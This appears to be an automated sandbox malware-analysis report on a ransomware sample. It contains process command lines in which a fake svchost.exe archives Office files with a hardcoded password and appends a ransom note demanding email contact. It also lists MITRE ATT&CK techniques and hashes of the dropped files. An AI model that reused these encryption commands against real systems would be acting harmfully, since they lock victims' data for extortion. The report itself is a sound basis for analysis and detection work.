  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Fonts\Waveform.xml(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Fonts\Waveform.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  PID:1240
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\MEDIA\CAGCAT10\J0284916.JPG(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\MEDIA\CAGCAT10\J0284916.JPG" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  PID:1264
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\MEDIA\CAGCAT10\J0302827.JPG(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\MEDIA\CAGCAT10\J0302827.JPG" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  PID:1572
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\MEDIA\CAGCAT10\J0302953.JPG(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\MEDIA\CAGCAT10\J0302953.JPG" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  PID:2948
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\MEDIA\CAGCAT10\J0315447.JPG(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\MEDIA\CAGCAT10\J0315447.JPG" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  PID:2136
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\1033\Bibliography\BIBFORM.XML(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\Office14\1033\Bibliography\BIBFORM.XML" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  PID:2436
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\1033\CT_ROOTS.XML(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\Office14\1033\CT_ROOTS.XML" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  PID:2876
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\1033\GrooveForms5\FormsStyles\Solutions\arrow.png(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\Office14\1033\GrooveForms5\FormsStyles\Solutions\arrow.png" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  PID:1400
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\1033\GrooveForms5\FormsStyles\Solutions\gradient.png(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\Office14\1033\GrooveForms5\FormsStyles\Solutions\gradient.png" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  PID:2328
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\1033\OUTFORM.DAT(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\Office14\1033\OUTFORM.DAT" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  - System Location Discovery: System Language Discovery
  PID:2856
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\1033\PROTTPLN.DOC(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\Office14\1033\PROTTPLN.DOC" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  PID:2800
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\1033\PROTTPLN.XLS(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\Office14\1033\PROTTPLN.XLS" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  - System Location Discovery: System Language Discovery
  PID:2892
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\1033\PROTTPLV.DOC(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\Office14\1033\PROTTPLV.DOC" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  PID:2788
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\1033\PROTTPLV.XLS(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\Office14\1033\PROTTPLV.XLS" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  PID:2736
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\1033\PSRCHKEY.DAT(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\Office14\1033\PSRCHKEY.DAT" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  PID:2340
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\1033\PSRCHLEX.DAT(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\Office14\1033\PSRCHLEX.DAT" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  PID:2504
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\1033\PSRCHLTS.DAT(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\Office14\1033\PSRCHLTS.DAT" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  PID:1916

C:\Windows\explorer.exe
explorer.exe
1⤵
- Boot or Logon Autostart Execution: Active Setup
- Drops file in Windows directory
- Modifies registry class
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:1996

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Boot or Logon Autostart Execution

T1547

Active Setup

T1547.014

Registry Run Keys / Startup Folder

T1547.001

Pre-OS Boot

T1542

Bootkit

T1542.003

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Active Setup

T1547.014

Registry Run Keys / Startup Folder

T1547.001

Defense Evasion

Modify Registry

T1112

Pre-OS Boot

T1542

Bootkit

T1542.003

Credential Access

Discovery

Network Share Discovery

T1135

Peripheral Device Discovery

T1120

Query Registry

T1012

Remote System Discovery

T1018

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

System Network Configuration Discovery

T1016

Internet Connection Discovery

T1016.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\MSOCache\All Users\{90140000-0011-0000-0000-0000000FF1CE}-C\Setup.xml(!! to decrypt email id 1759665594 to [email protected] !!).exe

Filesize
123KB

MD5
b205c3aea370b43fcbdbc23d6de36208

SHA1
83060ef41eb06626b29157ae17bd5e1d778ab185

SHA256
1f85cb25852a7807bb3b1ba437d7543329ca37cd8ea01b3259f7218590a025a7

SHA512
9149df2fd3c228660c385817ce50dfd80fae92ccd145642c8c42478c2a4be1e3d0fc1da09304ae7a8b239a3137c567a673e597ba845d289f27924c83708594c9

Download Submit
C:\Users\Public\Desktop\how to decrypt files.lnk

Filesize
606B

MD5
93a6a540601eaef6a7d65c67e4c7c68a

SHA1
aba620cac4d2838df14f878d79a37d667bb19141

SHA256
0afcb7afb0a98e534df102423b6369895435cf2eceddb9e419c240da6520f8fa

SHA512
40ac79cc3a6a7daf350ef58675cdd8c719bf4a168b5fd2614c9e93470cc9a7d45716fe1a70f18fa20f3fd5f511d314b7ac6670e2c950a1e45d488579626a92ee

Download Submit
C:\Users\Public\Desktop\rvid1000.txt

Filesize
54B

MD5
5eca9fd7a53056996e961c878b135e43

SHA1
33f64cd69de69aaf1b1f3788af52b7c975abd318

SHA256
41d4c7e3406d1b89d8b3b2674698bd504df1ce8ce05c9d35fb7da31b38aa5133

SHA512
2d7dde0916ffa7ad1b929cb63714b7e19f6d5f331184cfec739cab9ea151745cd1c936a3de18e075015738eaaffbc9c87c33ce9523e2006a785090089b1f9809

Download Submit
C:\Windows\SysWOW64\NoSafeMode.dll

Filesize
12KB

MD5
6bb3bca23fdff5b013863d8423267251

SHA1
2e6b80241d1a9269cc30e13663e6f910a0893450

SHA256
bdb1a0b687ced575e71702b7b4554063e697791bc2b2a286a0e4dfd528739670

SHA512
de6230dfe87df4840314983573c94ce332f5bfe9996de852c6e47844e785a4e7a8e4084a6d9ed1fd4aac78b896d2158a201ff202635c205bf50e2507c1165478

Download Submit
C:\Windows\SysWOW64\cfwin32.dll

Filesize
394KB

MD5
53894890dc01bbcace449f6590a1597b

SHA1
b27c93ef650d79a49150e61cd668b01bee543a30

SHA256
2f3f037b07737101076f50664ea3af10f76970febdcba4bd0e38d5a0eca4f6dd

SHA512
2ab1d894688ba8ee4129c575a116e7d01840d553a3956c3c158921e0794207ae9d0396c4c848c9e6592f40466e893ed19165e5eb34c53e02fe19fb65265c3a5a

Download Submit
C:\Windows\SysWOW64\csrss32.dll

Filesize
167KB

MD5
1ccda7a99f4552d258663a1dea54a07e

SHA1
b761408d4403ea07261cceb5a8afe789c4fc2c19

SHA256
098cccfa11432f742591078ab41571efa5e325c327a0f9797da385e48da09615

SHA512
f8e4c689608206cd0c5ccf9a36533ea74da7008a21e159ef7ebd199fd63a54c3a86f6842afefb282e5ebf1124664098d52b2acdcca53027d83d42248c2204b1e

Download Submit
C:\Windows\SysWOW64\csrss64.dll

Filesize
175KB

MD5
e42494d05a95f296bc38bedef3cba905

SHA1
aca3e577a7c8a40f6eb9aef1aa7573214853a723

SHA256
7d13d63c817ccdf3817b4d06bd20035535f238980d1b7b110713576dee97834e

SHA512
0fffff443a9c12e80b8af7caa4763fde76158c45cffc62f3d0773399b08592ddeae95d5ffb688ddbb29d5a08a3aadade0121f51aea3742cdc248dd45def14ce1

Download Submit
C:\Windows\SysWOW64\default2.sfx

Filesize
92KB

MD5
94059cc33eba96910993e644a55a1655

SHA1
c6c6ba99e43aa09a5bad6345a20b4dc530589862

SHA256
72af31e06d948f50fdc95526653bbad591b869e4542fc8fbb654ca49a2fd3574

SHA512
80048eb4b40b3e26a68af736bb8c7a459239763f69ed8f9e36bd243c1eed7c20901adaecf16bc993af0fbb2e35ae32bc0a13cc40329db42c251c05411a6aea5e

Download Submit
C:\Windows\SysWOW64\uwnmspwks.rrr

Filesize
4KB

MD5
d09d26d4e541950771ea70009953d910

SHA1
99d1f9939e15f604694b4927bcd93d76f9dcd845

SHA256
0e36ff6acc0e2522e1066f6ca1c659eeb1948da69e8bfef7405588aaff1f6389

SHA512
4843205cb3da74e62e3c88c855b3694bea067d33a54f38ec3fc324d86e83d2b7ffbb66b515cbebf9269b88a886f81aa45fbb8adcdd5c500a3f9ef10e952391fc

Download Submit
\Windows\SysWOW64\nsf.exe

Filesize
47KB

MD5
e6d58e0a4511695312f13d1b9f154187

SHA1
a23d75e1a3462e66db08f7664683e186c9e8e5fb

SHA256
ff16042183c0ed025c523ea1ae3edd679fd929dfbda0089756186f5bcba5b35b

SHA512
09b154123d8e21a7c93f8d99009e0e322a2ede7f4c8f12bcdebd0078787efb0f9d3b5e43a7b3936b933bd974777fccefbc3af24b834e8cd7137d2931cfeff833

Download Submit
\Windows\SysWOW64\svschost.exe

Filesize
34KB

MD5
60a87ec2fcea72cb0e254f8fd36c5006

SHA1
0b1dde47b736150a4e8338e65e48bb0a6ebf9c4b

SHA256
ba179f357218285c4518f792f1736ec0ee831c85298998a184ac4a1c6145eb7e

SHA512
7d5f64e6dc90e21bb4d6fc7d4c229622334bc8c0662b9227fe893286d373655c6c2664aa01648bc796383b80d225ad4038208db48e7fb796cc911b4093ff895d

Download Submit
memory/1252-37-0x0000000003450000-0x0000000003470000-memory.dmp

Filesize
128KB

Download
memory/1252-45-0x0000000003460000-0x0000000003480000-memory.dmp

Filesize
128KB

Download
memory/1252-88-0x0000000003460000-0x0000000003480000-memory.dmp

Filesize
128KB

Download
memory/1252-79-0x0000000003450000-0x0000000003470000-memory.dmp

Filesize
128KB

Download
memory/1252-31-0x0000000003450000-0x0000000003470000-memory.dmp

Filesize
128KB

Download
memory/1252-96-0x0000000003460000-0x0000000003480000-memory.dmp

Filesize
128KB

Download
memory/1252-57-0x0000000003460000-0x0000000003480000-memory.dmp

Filesize
128KB

Download
memory/1252-56-0x0000000003450000-0x0000000003470000-memory.dmp

Filesize
128KB

Download
memory/1252-46-0x0000000003460000-0x0000000003480000-memory.dmp

Filesize
128KB

Download
memory/1252-47-0x0000000003460000-0x0000000003480000-memory.dmp

Filesize
128KB

Download
memory/1252-89-0x0000000003460000-0x0000000003480000-memory.dmp

Filesize
128KB

Download
memory/1964-53-0x0000000010000000-0x000000001000C000-memory.dmp

Filesize
48KB

Download
memory/1964-55-0x0000000000400000-0x0000000000420000-memory.dmp

Filesize
128KB

Download
memory/2884-95-0x0000000000400000-0x0000000000420000-memory.dmp

Filesize
128KB

Download

Resubmissions

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads